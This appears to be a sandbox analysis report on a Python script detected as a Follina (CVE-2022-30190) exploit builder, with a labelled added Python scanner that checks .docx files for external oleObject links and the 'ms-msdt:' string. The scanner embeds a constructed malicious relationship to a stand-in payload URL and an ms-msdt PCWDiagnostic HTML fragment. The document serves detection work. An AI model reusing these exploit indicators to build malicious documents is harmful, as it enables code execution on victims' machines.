Windows Analysis Report
follinaV1.2.py

Overview

General Information

Sample Name: follinaV1.2.py
Analysis ID: 646040
MD5: c1317d365d0084c4016a280a52608923
SHA1: ea358003fd5b1beba3b2e58991117127afb1eefd
SHA256: 076b22f6815cf168a813fa64e7f0b7e45d5312de16f8c9e65593160cc2c9cb1e

Detection

Follina CVE-2022-30190
Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
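Added example, not part of this report or of the analysed sample: the Yara hit above flags Follina (CVE-2022-30190) material, and the StackOverflow string below suggests the script packs a directory into a zip, which is how a .docx is built. The following Python triage check, written for this page, opens a .docx as a zip and looks for the two public Follina indicators: a word/_rels relationship of Type .../oleObject with TargetMode="External" (the document pulls its OLE object from a URL), and the "ms-msdt:" protocol string that the remote HTML uses to launch the diagnostics tool. The sample package, the URL http://example.invalid/payload.html! and the HTML fragment are constructed for the demo and are not taken from the sample.

```python
"""Triage check for Follina (CVE-2022-30190) indicators in a .docx.

Added example; not code from the sandbox report or the analysed script.
Indicators assumed from public analysis of the bug:
  * a *.rels Relationship of Type .../oleObject with TargetMode="External";
  * the string "ms-msdt:" in the package or in the fetched HTML.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)

# Constructed relationship parts for the demo (not from the real sample).
BENIGN_RELS = (
    f'<Relationships xmlns="{RELS_NS}">'
    '<Relationship Id="rId1" Target="media/image1.png" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/>'
    '</Relationships>'
).encode()
MALICIOUS_RELS = (
    f'<Relationships xmlns="{RELS_NS}">'
    f'<Relationship Id="rId9" Type="{OLE_TYPE}" '
    'Target="http://example.invalid/payload.html!" TargetMode="External"/>'
    '</Relationships>'
).encode()


def scan_docx(data: bytes) -> list:
    """Return (indicator, detail) tuples found in the package bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            blob = zf.read(name)
            if name.endswith(".rels"):
                try:
                    root = ET.fromstring(blob)
                except ET.ParseError:
                    findings.append(("unparseable_rels", name))
                    continue
                for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                    if (rel.get("TargetMode") == "External"
                            and rel.get("Type", "") == OLE_TYPE):
                        findings.append(("external_oleobject",
                                         f"{name}: {rel.get('Target', '')}"))
            # The docx itself rarely carries the ms-msdt: string, but check anyway.
            if MSDT_RE.search(blob):
                findings.append(("ms-msdt_uri", name))
    return findings


def scan_html(data: bytes) -> bool:
    """True if a fetched HTML page carries the ms-msdt: protocol handler string."""
    return MSDT_RE.search(data) is not None


def build_docx(rels_xml: bytes) -> bytes:
    """Constructed minimal package for the demo; real files carry many more parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    print("benign  :", scan_docx(build_docx(BENIGN_RELS)))
    print("suspect :", scan_docx(build_docx(MALICIOUS_RELS)))
    print("html    :", scan_html(b'<script>location.href="ms-msdt:/id PCWDiagnostic"</script>'))
```

An external oleObject relationship is not by itself proof of exploitation (linked OLE objects are a legitimate feature), so treat the hit as a reason to fetch and inspect the target, where scan_html gives the second indicator.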

Classification

Exploits

Source: Yara match File source: follinaV1.2.py, type: SAMPLE
Source: OpenWith.exe, 00000000.00000003.241144359.0000017025086000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000000.00000003.241165426.0000017025096000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000000.00000003.241125214.000001702508A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://en.wi7
Source: follinaV1.2.py String found in binary or memory: https://stackoverflow.com/questions/1855095/how-to-create-a-zip-archive-of-a-directory
Source: C:\Windows\System32\OpenWith.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: classification engine Classification label: mal48.expl.winPY@1/0@0/0
Source: C:\Windows\System32\OpenWith.exe Process information set: NOOPENFILEERRORBOX (8 occurrences)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation (3 occurrences)
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation (2 occurrences)
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation (2 occurrences)
No contacted IP infos